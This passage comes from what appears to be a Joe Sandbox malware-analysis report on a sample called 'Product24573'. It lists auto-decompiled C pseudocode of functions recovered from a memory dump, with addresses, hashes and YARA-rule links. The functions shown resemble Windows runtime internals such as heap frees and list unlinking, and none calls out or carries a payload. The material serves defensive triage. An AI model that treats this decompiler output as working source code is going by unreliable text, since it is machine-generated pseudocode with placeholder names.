						_t21 = _t30 & 0x00000006;
						_t16 = _t30;
						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
						asm("lock cmpxchg [edi], esi");
						if(_t16 == _t30) {
							break;
						}
						_t30 = _t16;
					}
					_t36 = _v8;
					if(_t21 == 2) {
						_t16 = E011300C2(0x11e8608, 0, _t28);
					}
				}
				if(_t36 != 0) {
					_t16 = L011177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
				}
				return _t16;
			}











                                          0x0112b395
                                          0x0112b3a2
                                          0x0112b3a5
                                          0x0112b3aa
                                          0x0112b3b2
                                          0x0112b3ba
                                          0x0112b3bd
                                          0x0112b3c0
                                          0x0112b3c4
                                          0x0112b3c9
                                          0x0116a3e9
                                          0x0116a3ed
                                          0x0116a3f0
                                          0x0116a3ff
                                          0x0116a403
                                          0x0116a409
                                          0x00000000
                                          0x00000000
                                          0x0116a40b
                                          0x0116a40b
                                          0x0116a40f
                                          0x0116a415
                                          0x0116a423
                                          0x0116a423
                                          0x0116a415
                                          0x0112b3d1
                                          0x0112b3e8
                                          0x0112b3e8
                                          0x0112b3d9

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1237c7f0d91493e34f6f67feed4fa5f2e420e3e2d16db893015239721da24666
                                          • Instruction ID: a47dd50c2039c80d21a1fccead9a7e51fcf46b79c0b62fb7afb8dc882eb7edfa
                                          • Opcode Fuzzy Hash: 1237c7f0d91493e34f6f67feed4fa5f2e420e3e2d16db893015239721da24666
                                          • Instruction Fuzzy Hash: B9116F333095205BCB2DCA599D4156B73AAFFC9330B254139DD16E7380CB715C12C795
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010F9240 Relevance: .1, Instructions: 63COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 77%
                                          			E010F9240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t41;
				intOrPtr* _t46;
				void* _t48;
				intOrPtr _t50;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				void* _t66;
				void* _t68;

				_push(0xc);
				_push(0x11cf708);
				E0114D08C(__ebx, __edi, __esi);
				_t65 = __ecx;
				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
				if( *(__ecx + 0x24) != 0) {
					_push( *(__ecx + 0x24));
					E011395D0();
					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
				}
				L6();
				L6();
				_push( *((intOrPtr*)(_t65 + 0x28)));
				E011395D0();
				_t33 =  *0x11e84c4; // 0x0
				L011177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
				_t37 =  *0x11e84c4; // 0x0
				L011177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
				_t41 =  *0x11e84c4; // 0x0
				E01112280(L011177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x11e86b4);
				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
				_t46 = _t65 + 0xe8;
				_t62 =  *_t46;
				_t60 =  *((intOrPtr*)(_t46 + 4));
				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
					_t61 = 3;
					asm("int 0x29");
					_push(_t65);
					_t66 = _t61;
					_t23 = _t66 + 0x14; // 0x8df8084c
					_push( *_t23);
					E011395D0();
					_t24 = _t66 + 0x10; // 0x89e04d8b
					_push( *_t24);
					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
					_t48 = E011395D0();
					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
					return _t48;
				} else {
					 *_t60 = _t62;
					 *((intOrPtr*)(_t62 + 4)) = _t60;
					 *(_t68 - 4) = 0xfffffffe;
					E010F9325();
					_t50 =  *0x11e84c4; // 0x0
					return E0114D0D1(L011177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
				}
			}















                                          0x010f9240
                                          0x010f9242
                                          0x010f9247
                                          0x010f924c
                                          0x010f924e
                                          0x010f9255
                                          0x010f9257
                                          0x010f925a
                                          0x010f925f
                                          0x010f925f
                                          0x010f9266
                                          0x010f9271
                                          0x010f9276
                                          0x010f9279
                                          0x010f927e
                                          0x010f9295
                                          0x010f929a
                                          0x010f92b1
                                          0x010f92b6
                                          0x010f92d7
                                          0x010f92dc
                                          0x010f92e0
                                          0x010f92e6
                                          0x010f92e8
                                          0x010f92ee
                                          0x010f9332
                                          0x010f9333
                                          0x010f9337
                                          0x010f9338
                                          0x010f933a
                                          0x010f933a
                                          0x010f933d
                                          0x010f9342
                                          0x010f9342
                                          0x010f9345
                                          0x010f9349
                                          0x010f934e
                                          0x010f9352
                                          0x010f9357
                                          0x010f92f4
                                          0x010f92f4
                                          0x010f92f6
                                          0x010f92f9
                                          0x010f9300
                                          0x010f9306
                                          0x010f9324
                                          0x010f9324

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 46e171c077592b35ec0627f410159ce1389cdab73362333567703bb0036bc368
                                          • Instruction ID: bfbe7b92ddb4724d0b8129903768d02cb8147743f5d578762288faa10c066c1f
                                          • Opcode Fuzzy Hash: 46e171c077592b35ec0627f410159ce1389cdab73362333567703bb0036bc368
                                          • Instruction Fuzzy Hash: 2A214C32041A01DFC76AEFA8CA41F59B7F9FF28708F14456CE15987AA2CB35E981CB44
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01184257 Relevance: .1, Instructions: 60COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 90%
                                          			E01184257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t18;
				intOrPtr _t24;
				intOrPtr* _t27;
				intOrPtr* _t30;
				intOrPtr* _t31;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr* _t35;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t43;

				_t39 = __eflags;
				_t35 = __edi;
				_push(8);
				_push(0x11d08d0);
				E0114D08C(__ebx, __edi, __esi);
				_t37 = __ecx;
				E011841E8(__ebx, __edi, __ecx, _t39);
				E0110EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
				_t18 = _t37 + 8;
				_t33 =  *_t18;
				_t27 =  *((intOrPtr*)(_t18 + 4));
				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
					L8:
					_push(3);
					asm("int 0x29");
				} else {
					 *_t27 = _t33;
					 *((intOrPtr*)(_t33 + 4)) = _t27;
					_t35 = 0x11e87e4;
					_t18 =  *0x11e87e0; // 0x0
					while(_t18 != 0) {
						_t43 = _t18 -  *0x11e5cd0; // 0xffffffff
						if(_t43 >= 0) {
							_t31 =  *0x11e87e4; // 0x0
							_t18 =  *_t31;
							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
								goto L8;
							} else {
								 *0x11e87e4 = _t18;
								 *((intOrPtr*)(_t18 + 4)) = _t35;
								L010F7055(_t31 + 0xfffffff8);
								_t24 =  *0x11e87e0; // 0x0
								_t18 = _t24 - 1;
								 *0x11e87e0 = _t18;
								continue;
							}
						}
						goto L9;
					}
				}
				L9:
				__eflags =  *0x11e5cd0;
				if( *0x11e5cd0 <= 0) {
					L010F7055(_t37);
				} else {
					_t30 = _t37 + 8;
					_t34 =  *0x11e87e8; // 0x0
					__eflags =  *_t34 - _t35;
					if( *_t34 != _t35) {
						goto L8;
					} else {
						 *_t30 = _t35;
						 *((intOrPtr*)(_t30 + 4)) = _t34;
						 *_t34 = _t30;
						 *0x11e87e8 = _t30;
						 *0x11e87e0 = _t18 + 1;
					}
				}
				 *(_t38 - 4) = 0xfffffffe;
				return E0114D0D1(L01184320());
			}















                                          0x01184257
                                          0x01184257
                                          0x01184257
                                          0x01184259
                                          0x0118425e
                                          0x01184263
                                          0x01184265
                                          0x01184273
                                          0x01184278
                                          0x0118427c
                                          0x0118427f
                                          0x01184281
                                          0x01184287
                                          0x011842d7
                                          0x011842d7
                                          0x011842da
                                          0x0118428d
                                          0x0118428d
                                          0x0118428f
                                          0x01184292
                                          0x01184297
                                          0x0118429c
                                          0x011842a0
                                          0x011842a6
                                          0x011842a8
                                          0x011842ae
                                          0x011842b3
                                          0x00000000
                                          0x011842ba
                                          0x011842ba
                                          0x011842bf
                                          0x011842c5
                                          0x011842ca
                                          0x011842cf
                                          0x011842d0
                                          0x00000000
                                          0x011842d0
                                          0x011842b3
                                          0x00000000
                                          0x011842a6
                                          0x0118429c
                                          0x011842dc
                                          0x011842dc
                                          0x011842e3
                                          0x01184309
                                          0x011842e5
                                          0x011842e5
                                          0x011842e8
                                          0x011842ee
                                          0x011842f0
                                          0x00000000
                                          0x011842f2
                                          0x011842f2
                                          0x011842f4
                                          0x011842f7
                                          0x011842f9
                                          0x01184300
                                          0x01184300
                                          0x011842f0
                                          0x0118430e
                                          0x0118431f

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 392f07f2a2d2eee1e89bcbfea0a3c921e402b08dd6d72259995e9348d2770acb
                                          • Instruction ID: 94f68652d9840e54f17d86f6b5f23cf158e74a4ab08b82ce587528ec2ab2c5b6
                                          • Opcode Fuzzy Hash: 392f07f2a2d2eee1e89bcbfea0a3c921e402b08dd6d72259995e9348d2770acb
                                          • Instruction Fuzzy Hash: 61215874945A06CFCB2DEFA8E100B14BBE2FB95358B14C26EE1658FA99DB319491CF01
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01122397 Relevance: .1, Instructions: 59COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 25%
                                          			E01122397(intOrPtr _a4) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t11;
				void* _t19;
				void* _t25;
				void* _t26;
				intOrPtr _t27;
				void* _t28;
				void* _t29;

				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
				if( *0x11e848c != 0) {
					L0111FAD0(0x11e8610);
					if( *0x11e848c == 0) {
						E0111FA00(0x11e8610, _t19, _t27, 0x11e8610);
						goto L1;
					} else {
						_push(0);
						_push(_a4);
						_t26 = 4;
						_t29 = E01122581(0x11e8610, 0x10d50a0, _t26, _t27, _t28);
						E0111FA00(0x11e8610, 0x10d50a0, _t27, 0x11e8610);
					}
				} else {
					L1:
					_t11 =  *0x11e8614; // 0x0
					if(_t11 == 0) {
						_t11 = E01134886(0x10d1088, 1, 0x11e8614);
					}
					_push(0);
					_push(_a4);
					_t25 = 4;
					_t29 = E01122581(0x11e8610, (_t11 << 4) + 0x10d5070, _t25, _t27, _t28);
				}
				if(_t29 != 0) {
					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
					 *((char*)(_t29 + 0x40)) = 0;
				}
				return _t29;
			}















                                          0x011223b0
                                          0x011223b6
                                          0x01122409
                                          0x01122415
                                          0x01165ae9
                                          0x00000000
                                          0x0112241b
                                          0x0112241b
                                          0x0112241d
                                          0x01122427
                                          0x0112242e
                                          0x01122430
                                          0x01122430
                                          0x011223b8
                                          0x011223b8
                                          0x011223b8
                                          0x011223bf
                                          0x011223fc
                                          0x011223fc
                                          0x011223c1
                                          0x011223c3
                                          0x011223d0
                                          0x011223d8
                                          0x011223d8
                                          0x011223dc
                                          0x011223de
                                          0x011223e1
                                          0x011223e1
                                          0x011223ec

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bc24652acc8f647aac3539bad8a77f160e89c24b0f2510eab5a7c5e24fe36d52
                                          • Instruction ID: e37634b01eb172c3b6a20add4b5737cf2eda743e6a708f78515cf82c2ba57f0f
                                          • Opcode Fuzzy Hash: bc24652acc8f647aac3539bad8a77f160e89c24b0f2510eab5a7c5e24fe36d52
                                          • Instruction Fuzzy Hash: 86116B3234431167E33CAA69EC40F1DBAD8FB64610F04802AF6069B190CBB4E851C754
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 011746A7 Relevance: .1, Instructions: 59COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 93%
                                          			E011746A7(signed short* __ecx, unsigned int __edx, char* _a4) {
				signed short* _v8;
				unsigned int _v12;
				intOrPtr _v16;
				signed int _t22;
				signed char _t23;
				short _t32;
				void* _t38;
				char* _t40;

				_v12 = __edx;
				_t29 = 0;
				_v8 = __ecx;
				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_t38 = L01114620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
				if(_t38 != 0) {
					_t40 = _a4;
					 *_t40 = 1;
					E0113F3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
					_t22 = _v12 >> 1;
					_t32 = 0x2e;
					 *((short*)(_t38 + _t22 * 2)) = _t32;
					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
					_t23 = E0112D268(_t38, 1);
					asm("sbb al, al");
					 *_t40 =  ~_t23 + 1;
					L011177F0(_v16, 0, _t38);
				} else {
					 *_a4 = 0;
					_t29 = 0xc0000017;
				}
				return _t29;
			}











                                          0x011746b7
                                          0x011746ba
                                          0x011746c5
                                          0x011746c8
                                          0x011746d0
                                          0x011746d4
                                          0x011746e6
                                          0x011746e9
                                          0x011746f4
                                          0x011746ff
                                          0x01174705
                                          0x01174706
                                          0x0117470c
                                          0x01174713
                                          0x0117471b
                                          0x01174723
                                          0x01174725
                                          0x011746d6
                                          0x011746d9
                                          0x011746db
                                          0x011746db
                                          0x01174732

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                          • Instruction ID: 50daca8c059f7ffaa0d97a635f7662c0d67c6e235b2bc7b660a14e3afe02f5b3
                                          • Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                          • Instruction Fuzzy Hash: 2811C272904608BBCB199F5CD8808BEF7B9EF99314F10806AF94487351DB318D55D7A5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010FC962 Relevance: .1, Instructions: 57COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 42%
                                          			E010FC962(char __ecx) {
				signed int _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t19;
				char _t22;
				intOrPtr _t26;
				intOrPtr _t27;
				char _t32;
				char _t34;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t38;
				signed int _t39;

				_t41 = (_t39 & 0xfffffff8) - 0xc;
				_v8 =  *0x11ed360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
				_t34 = __ecx;
				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
					_t26 = 0;
					E0110EEF0(0x11e70a0);
					_t29 =  *((intOrPtr*)(_t34 + 0x18));
					if(E0117F625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
						L9:
						E0110EB70(_t29, 0x11e70a0);
						_t19 = _t26;
						L2:
						_pop(_t35);
						_pop(_t37);
						_pop(_t27);
						return E0113B640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
					}
					_t29 = _t34;
					_t26 = E0117F1FC(_t34, _t32);
					if(_t26 < 0) {
						goto L9;
					}
					_t38 =  *0x11e70c0; // 0x0
					while(_t38 != 0x11e70c0) {
						_t22 =  *((intOrPtr*)(_t38 + 0x18));
						_t38 =  *_t38;
						_v12 = _t22;
						if(_t22 != 0) {
							_t29 = _t22;
							 *0x11eb1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
							_v12();
						}
					}
					goto L9;
				}
				_t19 = 0;
				goto L2;
			}


















                                          0x010fc96a
                                          0x010fc974
                                          0x010fc988
                                          0x010fc98a
                                          0x01167c9d
                                          0x01167c9f
                                          0x01167ca4
                                          0x01167cae
                                          0x01167cf0
                                          0x01167cf5
                                          0x01167cfa
                                          0x010fc992
                                          0x010fc996
                                          0x010fc997
                                          0x010fc998
                                          0x010fc9a3
                                          0x010fc9a3
                                          0x01167cb0
                                          0x01167cb7
                                          0x01167cbb
                                          0x00000000
                                          0x00000000
                                          0x01167cbd
                                          0x01167ce8
                                          0x01167cc5
                                          0x01167cc8
                                          0x01167cca
                                          0x01167cd0
                                          0x01167cd6
                                          0x01167cde
                                          0x01167ce4
                                          0x01167ce4
                                          0x01167cd0
                                          0x00000000
                                          0x01167ce8
                                          0x010fc990
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 269448c4291b4e32092a0074e5e842f9e478c7ef640c76004bf691fd3714e40c
                                          • Instruction ID: 5acc69dac4d2feb1d2ca249c5ee7db739eed79f199bc2c2a4fdfd1e87182d429
                                          • Opcode Fuzzy Hash: 269448c4291b4e32092a0074e5e842f9e478c7ef640c76004bf691fd3714e40c
                                          • Instruction Fuzzy Hash: AC110E31304A079BD72DAFADE885A2B7BE9BB84218B000938F95187695DB21ED60C7D1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 011337F5 Relevance: .1, Instructions: 57COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 87%
                                          			E011337F5(void* __ecx, intOrPtr* __edx) {
				void* __ebx;
				void* __edi;
				signed char _t6;
				intOrPtr _t13;
				intOrPtr* _t20;
				intOrPtr* _t27;
				void* _t28;
				intOrPtr* _t29;

				_t27 = __edx;
				_t28 = __ecx;
				if(__edx == 0) {
					E01112280(_t6, 0x11e8550);
				}
				_t29 = E0113387E(_t28);
				if(_t29 == 0) {
					L6:
					if(_t27 == 0) {
						E0110FFB0(0x11e8550, _t27, 0x11e8550);
					}
					if(_t29 == 0) {
						return 0xc0000225;
					} else {
						if(_t27 != 0) {
							goto L14;
						}
						L011177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
						goto L11;
					}
				} else {
					_t13 =  *_t29;
					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
						L13:
						_push(3);
						asm("int 0x29");
						L14:
						 *_t27 = _t29;
						L11:
						return 0;
					}
					_t20 =  *((intOrPtr*)(_t29 + 4));
					if( *_t20 != _t29) {
						goto L13;
					}
					 *_t20 = _t13;
					 *((intOrPtr*)(_t13 + 4)) = _t20;
					asm("btr eax, ecx");
					goto L6;
				}
			}











                                          0x011337fa
                                          0x011337fc
                                          0x01133805
                                          0x01133808
                                          0x01133808
                                          0x01133814
                                          0x01133818
                                          0x01133846
                                          0x01133848
                                          0x0113384b
                                          0x0113384b
                                          0x01133852
                                          0x00000000
                                          0x01133854
                                          0x01133856
                                          0x00000000
                                          0x00000000
                                          0x01133863
                                          0x00000000
                                          0x01133863
                                          0x0113381a
                                          0x0113381a
                                          0x0113381f
                                          0x0113386e
                                          0x0113386e
                                          0x01133871
                                          0x01133873
                                          0x01133873
                                          0x01133868
                                          0x00000000
                                          0x01133868
                                          0x01133821
                                          0x01133826
                                          0x00000000
                                          0x00000000
                                          0x01133828
                                          0x0113382a
                                          0x01133841
                                          0x00000000
                                          0x01133841

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d1152bbccd2d3ae08df39363b0b6907558ab828071b67a904c22bc061e8931dc
                                          • Instruction ID: 6774ba6663bc4b63569fc9dfb0ceceec7577c13d48c8b215f112bca2be9b4ecf
                                          • Opcode Fuzzy Hash: d1152bbccd2d3ae08df39363b0b6907558ab828071b67a904c22bc061e8931dc
                                          • Instruction Fuzzy Hash: 81012672A116119BC33F8B5D9900E26BBE6FFC1B6071641ADEA258B31DCB30C801C7C4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0112002D Relevance: .1, Instructions: 55COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E0112002D() {
				void* _t11;
				char* _t14;
				signed char* _t16;
				char* _t27;
				signed char* _t29;

				_t11 = E01117D50();
				_t27 = 0x7ffe0384;
				if(_t11 != 0) {
					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t14 = 0x7ffe0384;
				}
				_t29 = 0x7ffe0385;
				if( *_t14 != 0) {
					if(E01117D50() == 0) {
						_t16 = 0x7ffe0385;
					} else {
						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t16 & 0x00000040) != 0) {
						goto L18;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(E01117D50() != 0) {
						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					if( *_t27 != 0) {
						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						if(E01117D50() != 0) {
							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
						}
						if(( *_t29 & 0x00000020) == 0) {
							goto L5;
						}
						L18:
						return 1;
					} else {
						L5:
						return 0;
					}
				}
			}








                                          0x01120032
                                          0x01120037
                                          0x01120043
                                          0x01164b3a
                                          0x01120049
                                          0x01120049
                                          0x01120049
                                          0x0112004e
                                          0x01120053
                                          0x01164b48
                                          0x01164b5a
                                          0x01164b4a
                                          0x01164b53
                                          0x01164b53
                                          0x01164b5f
                                          0x00000000
                                          0x01164b61
                                          0x00000000
                                          0x01164b61
                                          0x01120059
                                          0x01120059
                                          0x01120060
                                          0x01164b6f
                                          0x01164b6f
                                          0x01120069
                                          0x01164b83
                                          0x00000000
                                          0x00000000
                                          0x01164b90
                                          0x01164b9b
                                          0x01164b9b
                                          0x01164ba4
                                          0x00000000
                                          0x00000000
                                          0x01164baa
                                          0x00000000
                                          0x0112006f
                                          0x0112006f
                                          0x00000000
                                          0x0112006f
                                          0x01120069

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                          • Instruction ID: 1183539bea89716b1b1ec809315329bf33e34deb655965539692899f85556ff9
                                          • Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                          • Instruction Fuzzy Hash: 4D1104326016918FE72F8B2CC944B357BE8EF44798F1E00B0ED0487B92D32EC861C665
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0110766D Relevance: .1, Instructions: 54COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 94%
                                          			E0110766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				char _v8;
				void* _t22;
				void* _t24;
				intOrPtr _t29;
				intOrPtr* _t30;
				void* _t42;
				intOrPtr _t47;

				_push(__ecx);
				_t36 =  &_v8;
				if(E0112F3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
					L10:
					_t22 = 0;
				} else {
					_t24 = _v8 + __ecx;
					_t42 = _t24;
					if(_t24 < __ecx) {
						goto L10;
					} else {
						if(E0112F3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
							goto L10;
						} else {
							_t29 = _v8 + _t42;
							if(_t29 < _t42) {
								goto L10;
							} else {
								_t47 = _t29;
								_t30 = _a16;
								if(_t30 != 0) {
									 *_t30 = _t47;
								}
								if(_t47 == 0) {
									goto L10;
								} else {
									_t22 = L01114620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
								}
							}
						}
					}
				}
				return _t22;
			}










                                          0x01107672
                                          0x0110767f
                                          0x01107689
                                          0x011076de
                                          0x011076de
                                          0x0110768b
                                          0x01107691
                                          0x01107693
                                          0x01107697
                                          0x00000000
                                          0x01107699
                                          0x011076a8
                                          0x00000000
                                          0x011076aa
                                          0x011076ad
                                          0x011076b1
                                          0x00000000
                                          0x011076b3
                                          0x011076b3
                                          0x011076b5
                                          0x011076ba
                                          0x011076bc
                                          0x011076bc
                                          0x011076c0
                                          0x00000000
                                          0x011076c2
                                          0x011076ce
                                          0x011076ce
                                          0x011076c0
                                          0x011076b1
                                          0x011076a8
                                          0x01107697
                                          0x011076d9

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                          • Instruction ID: 8cd10190d142eb2ce465fdf80698fd0046644a15aad93204b6363289a1a9e238
                                          • Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                          • Instruction Fuzzy Hash: 3201D832F00119ABE725AE5ECC50E9B7BADEB84660F140524FA49CF2C0DB71EC41C3A0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010F9080 Relevance: .1, Instructions: 53COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 69%
                                          			E010F9080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				intOrPtr* _t51;
				intOrPtr _t59;
				signed int _t64;
				signed int _t67;
				signed int* _t71;
				signed int _t74;
				signed int _t77;
				signed int _t82;
				intOrPtr* _t84;
				void* _t85;
				intOrPtr* _t87;
				void* _t94;
				signed int _t95;
				intOrPtr* _t97;
				signed int _t99;
				signed int _t102;
				void* _t104;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t97 = __ecx;
				_t102 =  *(__ecx + 0x14);
				if((_t102 & 0x02ffffff) == 0x2000000) {
					_t102 = _t102 | 0x000007d0;
				}
				_t48 =  *[fs:0x30];
				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
					_t102 = _t102 & 0xff000000;
				}
				_t80 = 0x11e85ec;
				E01112280(_t48, 0x11e85ec);
				_t51 =  *_t97 + 8;
				if( *_t51 != 0) {
					L6:
					return E0110FFB0(_t80, _t97, _t80);
				} else {
					 *(_t97 + 0x14) = _t102;
					_t84 =  *0x11e538c; // 0x77996828
					if( *_t84 != 0x11e5388) {
						_t85 = 3;
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x2c);
						_push(0x11cf6e8);
						E0114D0E8(0x11e85ec, _t97, _t102);
						 *((char*)(_t104 - 0x1d)) = 0;
						_t99 =  *(_t104 + 8);
						__eflags = _t99;
						if(_t99 == 0) {
							L13:
							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
							if(__eflags == 0) {
								E011C88F5(_t80, _t85, 0x11e5388, _t99, _t102, __eflags);
							}
						} else {
							__eflags = _t99 -  *0x11e86c0; // 0xca07b0
							if(__eflags == 0) {
								goto L13;
							} else {
